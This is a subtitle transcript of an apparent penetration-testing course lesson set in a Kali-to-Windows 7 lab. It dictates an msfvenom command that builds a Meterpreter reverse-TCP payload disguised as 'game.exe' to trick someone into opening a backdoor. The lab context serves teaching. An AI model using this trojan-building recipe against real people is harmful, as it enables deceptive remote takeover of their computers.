1 00:00:01,010 --> 00:00:07,130 All right, in the previous lesson, we installed the VirtualBox Guest Additions, so that we would be able to
2 00:00:07,130 --> 00:00:09,490 copy and paste easily; that's going to be pretty important.
3 00:00:09,500 --> 00:00:14,720 It sounds like a small thing, but it'll save a lot of writing things down and retyping them.
4 00:00:15,110 --> 00:00:20,840 When we hacked from a Kali Linux box into Windows 7, we saw that Windows 7 is on almost half
5 00:00:20,840 --> 00:00:22,250 of the desktops worldwide,
6 00:00:22,250 --> 00:00:29,570 still, even though we're two versions away from that currently. And we're going to use Metasploit,
7 00:00:29,570 --> 00:00:35,240 the framework that comes with Kali Linux, set up so that we can hack into that Windows 7 computer
8 00:00:35,690 --> 00:00:44,100 using one of the most powerful frameworks for system vulnerability testing and penetration testing, Metasploit.
9 00:00:44,810 --> 00:00:47,240 So first of all, we've got both of our machines open.
10 00:00:47,550 --> 00:00:50,840 I'm going to go to full screen for Kali, so that you should be able to see this better.
11 00:00:51,320 --> 00:00:53,840 And we're going to start the Metasploit framework.
12 00:00:53,840 --> 00:01:00,890 You can find that here on the left-hand bar, or you can come under Applications, Exploitation Tools,
13 00:01:01,070 --> 00:01:06,610 Metasploit; either one of those will open it up, and I'm going to open a second terminal window.
14 00:01:06,620 --> 00:01:08,210 You notice that this is terminal driven.
15 00:01:09,810 --> 00:01:18,600 I'm going to start the PostgreSQL, or Postgres, or PostgreSQL database service so that
16 00:01:18,600 --> 00:01:20,250 we can search things really quickly.
17 00:01:20,760 --> 00:01:27,540 So we'll say service postgresql start.
18 00:01:29,440 --> 00:01:31,000 We've got our database up and running.
19 00:01:32,310 --> 00:01:34,830 And just as a reality check, ifconfig.
20 00:01:36,370 --> 00:01:42,040 It tells us that we are on 10.0.3.5. Your address may be slightly different: if you started
21 00:01:42,040 --> 00:01:46,390 your Windows box after your Kali Linux box on this private network, you may have picked up a different
22 00:01:46,390 --> 00:01:46,990 address.
23 00:01:47,320 --> 00:01:49,030 I am 10.0.3.5.
24 00:01:49,030 --> 00:01:53,010 That's going to be very important for a lot of our exploits here.
25 00:01:53,620 --> 00:01:59,830 So the first thing we've done is run our msfconsole, and this is MSF, the Metasploit Framework
26 00:01:59,830 --> 00:02:00,400 console.
27 00:02:00,400 --> 00:02:04,150 And you can see that I have a prompt down here for MSF.
28 00:02:04,720 --> 00:02:07,240 I'm going to start
29 00:02:07,240 --> 00:02:12,220 msfvenom, and I'm going to create a payload that's going to be an executable file that I'll be able to
30 00:02:12,220 --> 00:02:15,610 run from my Windows computer.
31 00:02:15,910 --> 00:02:20,140 And I'm going to serve that up on a Web server on this Kali Linux box.
32 00:02:20,710 --> 00:02:26,710 This is somewhat similar to how we used the social engineering toolkit back in Section 5
33 00:02:26,710 --> 00:02:34,090 to fool someone into entering their user credentials into a fake Facebook
34 00:02:34,090 --> 00:02:34,480 page.
35 00:02:34,660 --> 00:02:38,920 We're going to fool someone into downloading something that looks like a game but actually gives us
36 00:02:38,920 --> 00:02:42,000 a back door to control their computer as an administrator.
37 00:02:42,490 --> 00:02:46,360 So the command that we want to run is msfvenom.
38 00:02:47,440 --> 00:02:49,330 And you'll see why this is named Venom
39 00:02:49,330 --> 00:02:54,730 once we use it next time. I'm going to make that a little bigger and clear the screen.
40 00:02:57,590 --> 00:02:58,520 Now,
41 00:02:58,520 --> 00:02:59,840 msfvenom.
42 00:03:02,920 --> 00:03:11,230 And we want to specify a payload that we're going to deliver to our Windows 7 box, and that payload
43 00:03:11,230 --> 00:03:14,380 is going to be a very powerful tool called Meterpreter.
44 00:03:14,450 --> 00:03:20,650 Meterpreter comes with the Metasploit framework, and it allows us to set up an interpreter, or a running
45 00:03:20,650 --> 00:03:26,050 shell, that lets us communicate with that Windows 7 box, and we'll be able to eventually take it over
46 00:03:26,050 --> 00:03:26,970 as an administrator.
47 00:03:27,670 --> 00:03:37,660 So our msfvenom gets followed by -p for payload, windows, windows/meterpreter
48 00:03:41,420 --> 00:03:49,370 /reverse_tcp. That's going to establish a reverse TCP connection; in other words, the
49 00:03:49,370 --> 00:03:51,580 Windows 7 machine is going to call us.
50 00:03:51,590 --> 00:03:59,960 It's going to call the Kali Linux machine using TCP, or the Transmission Control Protocol, just the
51 00:04:00,260 --> 00:04:03,990 regular TCP/IP that the World Wide Web uses to communicate.
52 00:04:04,280 --> 00:04:08,880 So we're going to establish a connection from that Windows 7 box back to our Linux box.
53 00:04:09,170 --> 00:04:12,590 Well, we need to tell it the host address of the Kali Linux box.
54 00:04:13,010 --> 00:04:20,360 So we'll say LHOST equals, and we need that IP address, 10.0.3.5, so we can
55 00:04:20,360 --> 00:04:21,080 even copy it.
56 00:04:22,830 --> 00:04:28,650 Come up here and paste. That way, we make sure we get it exactly right: 10.0.3.5.
57 00:04:28,650 --> 00:04:31,550 Make sure you match whatever your ifconfig says.
58 00:04:32,190 --> 00:04:40,080 Next, we tell it the format that we want to export this payload in, and that is going to be -f, and it's
59 00:04:40,080 --> 00:04:46,710 going to be an exe file, or an executable file for Windows: -f, space,
60 00:04:46,710 --> 00:04:53,100 exe. This is going to wrap a line, but you can see how it works there. And now we need to tell it the
61 00:04:53,310 --> 00:04:57,160 name of the file and where we want to store that as an output file.
62 00:04:57,480 --> 00:05:03,690 So this is going to create a payload, or an executable file, that we're going to run on our Windows 7
63 00:05:03,690 --> 00:05:09,240 computer, and I'll output that to /root/Desktop/
64 00:05:12,650 --> 00:05:16,670 and let's call it game.exe.
65 00:05:17,800 --> 00:05:24,640 So this is going to look like a game that we're tricking someone into downloading and running on their
66 00:05:24,640 --> 00:05:32,920 Windows 7 computer. Once you run that, if you've put the output location as /root/Desktop/game.exe,
67 00:05:32,920 --> 00:05:39,610 if we pull this down now, we see game.exe is here on the Kali Linux desktop.
68 00:05:39,620 --> 00:05:47,800 So this has created a Windows executable; notice, an x86 Windows platform executable.
69 00:05:48,280 --> 00:05:53,010 That's an executable format, or exe format, called game.exe.
70 00:05:53,470 --> 00:05:57,670 So we have our payload ready to go. In the next lesson,
71 00:05:57,670 --> 00:06:04,450 we're going to see how to put this up on a temporary Web page that we're going to set up on this Kali
72 00:06:04,450 --> 00:06:08,930 Linux box so that we can exploit it and run it on our Windows 7 computer.
73 00:06:09,340 --> 00:06:14,230 We'll see how to set up the exploit Web site in the next lesson.